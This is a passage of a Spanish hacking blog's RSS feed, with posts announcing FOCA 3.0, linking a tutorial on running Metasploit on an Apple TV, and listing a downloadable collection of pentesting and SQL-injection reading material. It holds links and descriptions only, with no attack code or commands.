&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#movingforward TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#movingforward TARGET="&gt;Why do developers make these dangerous software errors?&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/movingforward.pptx%20TARGET="&gt;PPTX&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Ryan Barnett&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#crs TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#crs TARGET="&gt;OWASP CRS and AppSensor Project&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://prezi.com/pj1hfhf6wrow/integrating-appsensor-in-modseccurity/%20TARGET="&gt;Prezi [Flash]&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Alex Smolen&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#ux TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#ux TARGET="&gt;Application Security and User Experience&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt; (&lt;/span&gt;&lt;a _blank"="" href="http://www.appsecusa.org/p/ux.pdf%20TARGET="&gt;PDF&lt;/a&gt;&lt;span class="Apple-style-span" style="color: black;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;&lt;div style="text-align: justify;"&gt;
Gunnar Peterson&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#mobilewebservices TARGET="&gt;&lt;/a&gt;&lt;a _blank"="" href="http://www.appsecusa.org/talks.html#mobilewebservices TARGET="&gt;Mobile Web Services&lt;/a&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Fuente:&lt;/b&gt; &lt;a href="http://blog.segu-info.com.ar/2011/11/presentaciones-owasp-appsec-2011.html"&gt;http://blog.segu-info.com.ar/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-4199387822386469933?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/DfG3zzmYIDu8vC4tNDdHmYWVZsY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DfG3zzmYIDu8vC4tNDdHmYWVZsY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/DfG3zzmYIDu8vC4tNDdHmYWVZsY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DfG3zzmYIDu8vC4tNDdHmYWVZsY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/DX0SXbwMZN4" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-03T22:39:21.686-03:00</app:edited><media:thumbnail url="http://4.bp.blogspot.com/-BQ11JgVBfI8/TrNBVcROJRI/AAAAAAAAAY4/Vw_sBggFsvw/s72-c/OWASP.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://www.blackploit.com/2011/11/presentaciones-y-videos-owasp-appses.html</feedburner:origLink></item><item><title>FOCA 3.0 FREE Listo para la Descarga!</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/x1POPH_gyF0/foca-30-free-listo-para-la-descarga.html</link><category>Herramientas</category><category>Hack T00LZ</category><category>Programas Windows</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Thu, 27 Oct 2011 20:21:34 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-5312821848183089396</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/TEapMPqlLFI/AAAAAAAAGoc/mFzmkLS8lG4/s1600/FOCA_black.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" rel="lytebox"&gt;&lt;img border="0" height="151" src="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/TEapMPqlLFI/AAAAAAAAGoc/mFzmkLS8lG4/s400/FOCA_black.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Bueno, yo creo que ya muchos conocen la FOCA proyecto desarrollado por &lt;a href="http://www.informatica64.com/" target="_blank"&gt;Informática 64&lt;/a&gt;, si no lo&amp;nbsp;conocéis, me remito a copiar y pegar textual la descripción que está en la web.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
FOCA es una herramienta para la realización de procesos de fingerprinting e information gathering en trabajos de auditoría web. La versión Free realiza búsqueda de servidores, dominios, URLs y documentos publicados, así como el descubrimiento de versiones de software en servidores y clientes. FOCA se hizo famosa por la extracción de metadatos en documentos públicos, pero hoy en día es mucho más que eso. Puedes obtener más información acerca de FOCA en los siguientes enlaces:&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.darkreading.com/blog/227700505/foca-and-the-power-of-metadata-analysis.html" target="_blank"&gt;http://www.darkreading.com/blog/227700505/foca-and-the-power-of-metadata-analysis.html&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="https://www.infosecisland.com/blogview/6707-Metadata-Analysis-With-FOCA-25.html" target="_blank"&gt;https://www.infosecisland.com/blogview/6707-Metadata-Analysis-With-FOCA-25.html&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.securitytube.net/video/1353" target="_blank"&gt;http://www.securitytube.net/video/1353&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.youtube.com/watch?v=Ou4TRvzYpVk" target="_blank"&gt;http://www.youtube.com/watch?v=Ou4TRvzYpVk&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.youtube.com/watch?v=r3K7V4LL8yk" target="_blank"&gt;http://www.youtube.com/watch?v=r3K7V4LL8yk&lt;/a&gt;&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;&lt;a href="http://www.youtube.com/watch?v=l9R_m7TI-7A" target="_blank"&gt;http://www.youtube.com/watch?v=l9R_m7TI-7A&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La versión 3.0 fue liberada y está lista para la descarga:&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span class="Apple-style-span" style="font-size: large;"&gt;&lt;b&gt;&lt;a href="http://www.informatica64.com/descargas/Foca_Free_3_0_20111027.zip" target="_blank"&gt;Descarga FOCA 3.0&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 336 x 280 */
google_ad_slot = "8058258251";
google_ad_width = 336;
google_ad_height = 280;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
También&amp;nbsp;pueden descargarla&amp;nbsp;metiéndose&amp;nbsp;en&amp;nbsp;&lt;a href="http://www.informatica64.com/foca.aspx" target="_blank"&gt;http://www.informatica64.com/foca.aspx&lt;/a&gt;&amp;nbsp;y registrando su email.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Salu2&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[+] Zion3R&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-5312821848183089396?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/HfBtCOnQTQRCuzKTAEnzzxyKmQU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/HfBtCOnQTQRCuzKTAEnzzxyKmQU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/HfBtCOnQTQRCuzKTAEnzzxyKmQU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/HfBtCOnQTQRCuzKTAEnzzxyKmQU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/x1POPH_gyF0" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-28T00:21:34.073-03:00</app:edited><media:thumbnail url="http://2.bp.blogspot.com/_Y2uWeGSk9Sw/TEapMPqlLFI/AAAAAAAAGoc/mFzmkLS8lG4/s72-c/FOCA_black.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/10/foca-30-free-listo-para-la-descarga.html</feedburner:origLink></item><item><title>Metasploit en un Apple TV 2G</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/q5dIud2RL0U/metasploit-en-un-apple-tv-2g.html</link><category>Herramientas</category><category>Hack T00LZ</category><category>Tutoriales</category><category>Hack Tips</category><category>Metasploit</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Thu, 27 Oct 2011 19:44:14 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2334259456522665649</guid><description>&lt;div style="text-align: justify;"&gt;
&lt;a href="http://3.bp.blogspot.com/-c4KWnDP5Cis/TqoU2EnAeqI/AAAAAAAAAYk/IY3nBTDkS4E/s1600/apple+tv+2g+-+metasploit.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: justify;" rel="lytebox"&gt;&lt;img border="0" height="132" src="http://3.bp.blogspot.com/-c4KWnDP5Cis/TqoU2EnAeqI/AAAAAAAAAYk/IY3nBTDkS4E/s200/apple+tv+2g+-+metasploit.png" width="200" /&gt;&lt;/a&gt;&lt;b&gt;Xc0d3&lt;/b&gt; me ha enviado un tutorial en el cual especifica como instalar y correr Metasploit en un&amp;nbsp;Apple TV 2G.&amp;nbsp;&lt;b&gt;Apple TV&lt;/b&gt; es un media center que podemos conectar a nuestro televisor y a través de él acceder a diversos contenidos multimedia como fotos, películas, series, radios y&amp;nbsp;vídeos&amp;nbsp;en linea.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La instalación es muy parecida a la&amp;nbsp;mayoría&amp;nbsp;de instalaciones en un dispositivo Apple, pero nunca deja de ser util para alguien que tenga un Apple TV.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;&lt;a href="http://www.multiupload.com/8YQ0NCBBJT" target="_blank"&gt;Descarga Turorial Cómo Instalar Metasploit en un Apple TV [PDF]&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Agradezco mucho los aportes y agradezco a Xc0d3 por dedicar su tiempo.&lt;/div&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R&lt;br /&gt;
[+] P.D: Si quieres enviarme un Tutorial, Manual o aporte, puedes hacerlo mediante blackploit@gmail.com&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-2334259456522665649?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Zhg6YQtzFmcxgJwhq9AP8KC1TvI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Zhg6YQtzFmcxgJwhq9AP8KC1TvI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Zhg6YQtzFmcxgJwhq9AP8KC1TvI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Zhg6YQtzFmcxgJwhq9AP8KC1TvI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/q5dIud2RL0U" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-27T23:44:14.937-03:00</app:edited><media:thumbnail url="http://3.bp.blogspot.com/-c4KWnDP5Cis/TqoU2EnAeqI/AAAAAAAAAYk/IY3nBTDkS4E/s72-c/apple+tv+2g+-+metasploit.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/10/metasploit-en-un-apple-tv-2g.html</feedburner:origLink></item><item><title>Compilado de Textos de Pentesting</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/DyWxAPoYvr4/compilado-de-textos-de-pentesting.html</link><author>noreply@blogger.com (Zion3R)</author><pubDate>Mon, 10 Oct 2011 18:19:12 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-6941605727812389261</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-lsF1lko0Sck/To9wRrDKoBI/AAAAAAAAAYc/Q0Z-e3arjWI/s1600/Compilado+de+Textos+de+Pentesting.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="108" src="http://1.bp.blogspot.com/-lsF1lko0Sck/To9wRrDKoBI/AAAAAAAAAYc/Q0Z-e3arjWI/s640/Compilado+de+Textos+de+Pentesting.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
Si eres uno de los que no nació sabiendo (como yo) y quieres tomarte enserio el tema del Pentest y/o Hacking, más te vale leer mucho y practicar mucho.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Hace poco que me llegó un mail de alguien que quería aprender de verdad y emprendí la tarea de encontrar todos aquellos texto que he leido (muchos los he imprimido) y han sido de ayuda para mi continuo aprendizaje y lo posteo aquí como un compilado para aquellos que les interese y motive el tema.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Dividí en 8 secciones los temas que según yo son los más importantes de aprender: &lt;b&gt;Textos Seguridad Informática&lt;/b&gt;, &lt;b&gt;Historia&lt;/b&gt;, &lt;b&gt;Metasploit&lt;/b&gt;, &lt;b&gt;SQLi&lt;/b&gt;, &lt;b&gt;Windows&lt;/b&gt;, &lt;b&gt;GNU\Linux&lt;/b&gt;, &lt;b&gt;Cheat Sheets&lt;/b&gt; &amp;amp; &lt;b&gt;Python&lt;/b&gt;.&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;├───Cheat Sheets - Packet Life
│       BGP.pdf
│       Cisco IOS Versions.pdf
│       Common ports.pdf
│       EIGRP.pdf
│       First Hop Redundancy.pdf
│       Frame Mode MPLS.pdf
│       IEEE 802.11 WLAN.pdf
│       IEEE 802.1X.pdf
│       IOS IPv4 Access Lists.pdf
│       IPsec.pdf
│       IPv4 Multicast.pdf
│       IPv4 Subnetting.pdf
│       IPv6.pdf
│       IS-IS.pdf
│       Markdown.pdf
│       MediaWiki.pdf
│       NAT.pdf
│       OSPF.pdf
│       Physical terminations.pdf
│       PPP.pdf
│       QoS.pdf
│       RIP.pdf
│       Scapy.pdf
│       Spanning Tree.pdf
│       Tcpdump.pdf
│       VLANs.pdf
│       VOIP Basics.pdf
│       Wireshark Display Filters.pdf
│
├───GNU-Linux
│       Administracion GNU Final (Español).pdf
│       ADMINISTRACIÓN DE UNIX (Español).PDF
│       Bash Pocket Reference.pdf
│       Creación de una distribución personalizada (Español).pdf
│       Enrutamiento avanzado y control de tráfico en Linux (Español).pdf
│       Expert Shell Scripting.pdf
│       Hungry Minds - Red Hat Linux 7.2 Bible Unlimited Ed.pdf
│       Implementacion Servidores Linux JULIO 2009 (Español).pdf
│       Linux Command Line and Shell Scripting Bible (2008).pdf
│       Linux Máxima Seguridad (Español).pdf
│       Pro Bash Programming - Scripting the GNU-Linux.pdf
│
├───Historia
│       UADv2.0 (Español).pdf
│       Un viaje en la historia del hacking (Español).pdf
│
├───Metasploit
│       Metasploit The Penetration Testers Guide.pdf
│       Metasploit Toolkit for Penetration Testing Exploit Development and Vulnerability Research.pdf
│       Metasploit Unleashed (Español).pdf
│       Metasploit Unleashed.pdf
│
├───Python
│       Introducción a la Programación con Python - Andrés Marzal e Isabel Gracia.pdf
│       Python para todos.pdf
│       Tutorial Python - Guido van Rossum.pdf
│
├───SQLi
│       An introduction to MySQL injection.pdf
│       BlackHat Europe 09 - Advanced SQL injection whitepaper.pdf
│       Blind MySQL Injection (Español).pdf
│       Blind SQL Injection.pdf
│       Hack x Crack SQLinjection (Español).pdf
│       MS SQL Injecting (Español).txt
│       My-SQL.pdf
│       SFX SQLi Paper (Español).pdf
│       SQL Injection Pocket Reference.pdf
│       SQL Injection Tutorial.pdf
│       SQL Injection White Paper.pdf
│       Tecnicas de SQL Injection Un Repaso (Español).pdf
│       Time-Based Blind SQL Injection using Heavy Queries.pdf
│       Técnicas de inyección en MySQL (Español).pdf
│
├───Textos Seguridad Informática
│       GUÍA DE PRUEBAS OWASP.pdf
│       Hacking Etico - Carlos Tori.pdf
│       OWASP Top 10 - 2010 FINAL.pdf
│       Taller Práctico de Auditoría y Pentest.pdf
│       Universidad Hacker.pdf
│
└───Windows
        Batch File Programming.pdf
        Windows Sysinternals Administrators Reference.pdf&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En la sección de &lt;b&gt;Textos Seguridad Informática&lt;/b&gt; incluí 5 textos que&amp;nbsp;considero&amp;nbsp;muy completos y de mucha ayuda, recomiendo partir por la &lt;i&gt;Guía OWASP &lt;/i&gt;ya que incluye la mayoría de los temas relevantes en el Hacking muy bien explicados y tomados desde una perspectiva ética, y toman en cuenta 2 escenarios: Caja Negra (procedimientos de auditoria a una aplicación sin conocimiento del código fuente y sin información privilegiada) y Caja Blanca (cuando se tiene información total sobre la aplicación auditada, incluye también saber el código fuente). También incluí un texto que es un poco más práctico, &lt;i&gt;Taller Práctico de Auditoria y Pentest&lt;/i&gt;,&amp;nbsp;que va más por el lado del aprendizaje del uso de las herramientas necesarias en el pentest, sumamente útil y muy actualizado. Los otros 3 textos que puse los&amp;nbsp;considero&amp;nbsp;muy bueno y útiles, asiendo&amp;nbsp;inca pie&amp;nbsp;de que &lt;i&gt;Hacking Ético por Carlos Tori&lt;/i&gt; hace poco que fue escrito por ende es muy actual.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En la sección &lt;b&gt;Historia&lt;/b&gt; incluí 2 textos para los amantes más de la literatura que de los textos meramente&amp;nbsp;técnicos&amp;nbsp;recomiendo partir por &lt;i&gt;Un Viaje por la historia del Hacking&lt;/i&gt; que es más corto y nos cuenta de los personajes emblema de esta&amp;nbsp;temática. También incluí &lt;i&gt;Uno al Día&lt;/i&gt;, texto que nos cuenta con bastante detalles y fechas las noticias y&amp;nbsp;acontecimientos&amp;nbsp;informaticos en los últimos años.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Consideré necesario hacer una sección&amp;nbsp;&lt;b&gt;Metasploit&lt;/b&gt; ya que es la herramienta emblema del hacking, ya es muy raro que dentro de la lista de herramientas de un Pentester no se&amp;nbsp;encuentre&amp;nbsp;está herramienta. Puse 4 textos, el que más destaco es &lt;i&gt;Metasploit Unleashed (Español)&lt;/i&gt; ya que está bien detallado y emprende los módulos más importantes y usados de Mestasploit. Los otros textos son muy buenos también, pero están en inglés, si te manejas en eso, pues lee mejor &lt;i&gt;Metasploit The Pentration Tester's Guide&lt;/i&gt;. Recordar que los textos son complementarios y de todos se puede sacar datos útiles.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En &lt;b&gt;SQLi&lt;/b&gt;, incluí varios textos de la vulnerabilidad más&amp;nbsp;masiva&amp;nbsp;y de mayor&amp;nbsp;criticidad. Es muy importante saber sobre está temática, ya que desde hace 20 años que existe esté problema con la seguridad de las bases de datos y seguirá estando&amp;nbsp;vigente&amp;nbsp;por mucho tiempo más. A mi me gusta bastante &lt;i&gt;SQL Injection Pocket Reference &lt;/i&gt;ya que cuando uno sabe del tema solo basta recordar las sentencias para poder hacer una auditoria&amp;nbsp;exitosa. Por lo demás, deje muchos otros textos que explican el tema y muchas de sus variantes. No os&amp;nbsp;preocupéis&amp;nbsp;si están en ingles los textos porque son muy entendibles.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En la sección&amp;nbsp;&lt;b&gt;Windows &lt;/b&gt;y en &lt;b&gt;GNU/Linux&lt;/b&gt;, puse varios textos relevantes de estos sistemas operativos, son más de ayuda para la administración de estos S.O. serán de utilidad para entender más a fondo la estructura de los sistemas, pero no son fundamental su lectura.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
También&amp;nbsp;incluí&amp;nbsp;la sección&amp;nbsp;&lt;b&gt;Cheat Sheets&lt;/b&gt; de Packet Life que&amp;nbsp;están&amp;nbsp;muy bien hechos, y como la memoria es&amp;nbsp;volátil&amp;nbsp; nunca esta demás tener una ayuda&amp;nbsp;rápida&amp;nbsp;para recordar.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por ultimo iba a poner una sección de Lenguajes de Programación (que es indispensable saberlo si quieres tomarte el tema enserio), pero hubiese tenido que poner muchos textos de muchos&amp;nbsp;lenguajes&amp;nbsp;de programación&amp;nbsp;influyentes&amp;nbsp;y usados,&amp;nbsp;así&amp;nbsp;que preferí poner una sección sobre &lt;b&gt;Python&lt;/b&gt; que creo que es el mejor lenguaje para aprender a programar. Si no sabes nada de Python parte por leerte &lt;i&gt;Introducción al Lenguaje de Programación con Python&lt;/i&gt; por&amp;nbsp;Andrés Marzal e Isabel Gracia, que es muy&amp;nbsp;didáctico&amp;nbsp;y muy detallista. También puse el &lt;i&gt;Tutorial de Python&lt;/i&gt; hecho por el mismo creador de esté (Guido van Rossum) y&amp;nbsp;también&amp;nbsp;&lt;i&gt;Python para Todos&lt;/i&gt; que es un texto muy recomendado siempre.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Y bueno, eso serían ALGUNOS textos sobre seguridad informática, siempre me han gustado los aportes,&amp;nbsp;así&amp;nbsp;que si ustedes tienen textos que consideren buenos y útiles por favor posteenlos en los comentarios, siempre se&amp;nbsp;agradece.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;a href="http://www.multiupload.com/7K74SGMU6J"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;Descarga Compilado de Textos de Pentesting&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* Bloque 1 */
google_ad_slot = "7923710689";
google_ad_width = 468;
google_ad_height = 60;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;/div&gt;
&lt;b&gt;Contraseña: &lt;span class="Apple-style-span" style="color: red;"&gt;www.blackploit.com&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
[+] Salu2&lt;br /&gt;
[+] Zion3R&lt;div class="blogger-post-footer"&gt;&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8845092171963399971-6941605727812389261?l=www.blackploit.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ICupSzc8FPx9tp2ck5q4APp0EZA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ICupSzc8FPx9tp2ck5q4APp0EZA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ICupSzc8FPx9tp2ck5q4APp0EZA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ICupSzc8FPx9tp2ck5q4APp0EZA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Hacking-blackploit/~4/DyWxAPoYvr4" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-10-10T22:19:12.099-03:00</app:edited><media:thumbnail url="http://1.bp.blogspot.com/-lsF1lko0Sck/To9wRrDKoBI/AAAAAAAAAYc/Q0Z-e3arjWI/s72-c/Compilado+de+Textos+de+Pentesting.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://www.blackploit.com/2011/10/compilado-de-textos-de-pentesting.html</feedburner:origLink></item><item><title>[Exploit Pack 1.0] Framework de Exploits para Pentest</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/FlILN2ceE3M/exploit-pack-10-framework-de-exploits.html</link><author>noreply@blogger.com (Zion3R)</author><pubDate>Thu, 13 Oct 2011 14:03:12 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-8062679806103976564</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
